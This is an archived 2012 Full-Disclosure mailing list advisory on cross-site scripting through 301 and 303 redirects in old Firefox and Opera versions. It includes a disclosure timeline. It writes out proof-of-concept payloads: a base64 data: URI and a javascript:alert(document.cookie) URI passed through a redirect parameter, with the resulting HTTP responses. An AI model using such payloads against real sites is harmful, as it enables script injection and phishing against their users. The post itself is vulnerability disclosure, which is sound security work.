lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <00cf01cd9f3e$398f3e10$9b7a6fd5@ml>
Date: Sun, 30 Sep 2012 22:02:25 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Cross-Site Scripting via redirectors 301 and 303
	in different browsers

Hello list!

Here is information about Cross-Site Scripting vulnerabilities via 
redirectors with statuses 301 and 303 in different browsers. This is 
continuation of my 2009's and 2010's advisories and articles about 302 
redirectors, such as article "Cross-Site Scripting attacks via redirectors" 
(http://websecurity.com.ua/3386/).

At 16.09.2012 I've found that Mozilla hiddenly fixed two XSS vulnerabilities 
via 302 redirectors in browsers Firefox 10.0.7 and Firefox 15.0.1 (about 
which I've informed them by e-mail and in Bugzilla and wrote in articles in 
2009 and 2010), without any official announcements and referencing on me. As 
I've checked in detail in all branches of the browser from 3.0.19 till 
15.0.1, in Mozilla Firefox 8.0.1 these XSS were working, and in 9.0.1 
already did not, i.e. they were hiddenly fixed in version 9.0.

And that day I've found Cross-Site Scripting vulnerabilities in browsers 
Mozilla Firefox and Opera via location header at statuses 301 and 303. The 
attacks via other 30x statuses don't work.

-------------------------
Affected products:
-------------------------

Vulnerable are Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 and previous 
versions. And Opera 10.62 and previous versions. The browsers IE6, IE7, IE8 
and Chrome are not affected.

Opera Software fixed (in lame way without referencing on me, which was not 
the fist time for them) this hole in Opera 10.63. The fix was for 302 
redirectors, which I've wrote about earlier concerning Opera and other 
browsers, but it should concerns also 301 and 303 redirectors.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS attacks via location-header redirectors with 301 and 303 statuses.

Attack #1:

Attack is doing by redirecting to data: URI (with or without using of 
base64).

With request to script at web site:

http://site/script.php?param=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Which returns 301 code in the answer:

HTTP/1.1 301 Moved Permanently
Location: 
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Or returns 303 code in the answer:

HTTP/1.1 303 See other
Location: 
data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+

Attack works in Firefox 3.0.19, 3.5.19, 3.6.28, 10.0.7, 15.0.1 ad Opera 
10.62. Because in the browsers Firefox and Opera the code is executing not 
in context of this site, hence there is no access to cookies. This 
vulnerability in browsers can be used for conducting of fishing attacks and 
executing of JavaScript code.

Attack #2:

Attack is doing by redirecting to javascript: URI.

With request to script at web site:

http://site/script.php?param=javascript:alert(document.cookie)


Which returns 301 code in the answer:

HTTP/1.1 301 Moved Permanently
Location: javascript:alert(document.cookie)

Or returns 303 code in the answer:

HTTP/1.1 303 See other
Location: javascript:alert(document.cookie)

Attack works in Opera 10.62 (as Strictly social XSS). Because in Opera the 
code is executing not in context of this site, hence there is no access to 
cookies. This vulnerability in browser can be used for conducting of fishing 
attacks and executing of JavaScript code.

------------
Timeline:
------------ 

2009.03.04 - informed Mozilla about XSS via different charsets and Charset 
Remembering vulnerability. Mozilla ignored.
2009.08.28 - informed Mozilla about XSS vulnerability via redirector with 
302 status. Mozilla ignored.
2010.08.07 - informed Mozilla about another XSS vulnerability via redirector 
with 302 status. Mozilla ignored.
2011.11.08 - Mozilla fixed part of charsets holes in MFSA 2011-47 (after 
informing from other researcher).
2011.12.20 - Mozilla hiddenly fixed XSS via 302 redirectors in Firefox 9.0.
2012.04.24 - Mozilla fixed other part of charsets holes in MFSA 2012-24 
(after informing from other researcher).
2012.09.16 - found hidden Mozilla fix of 302 redirectors in Firefox 10.0.7 
and Firefox 15.0.1. And later found that it was fixed already in 9.0.
2012.09.16 - checked XSS attacks via 301 and 303 redirectors in different 
browsers.
2012.09.25 - disclosed at my site (http://websecurity.com.ua/6067/).

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ